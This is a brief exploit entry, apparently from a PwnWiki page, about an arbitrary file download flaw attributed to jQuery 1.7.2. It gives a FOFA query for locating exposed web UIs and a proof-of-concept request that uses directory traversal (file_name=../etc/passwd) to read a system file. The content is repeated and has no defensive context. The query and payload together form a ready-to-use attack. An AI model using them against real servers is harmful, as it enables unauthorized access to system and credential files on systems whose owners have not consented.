JQuery 1.7.2 arbitrary file download vulnerability
From PwnWiki
Vulnerability Impact
JQuery 1.7.2
FOFA
body="webui/js/jquerylib/jquery-1.7.2.min.js"
POC
/webui/?g=sys_dia_data_down&file_name=../etc/passwd
JQuery 1.7.2
body="webui/js/jquerylib/jquery-1.7.2.min.js"
/webui/?g=sys_dia_data_down&file_name=../etc/passwd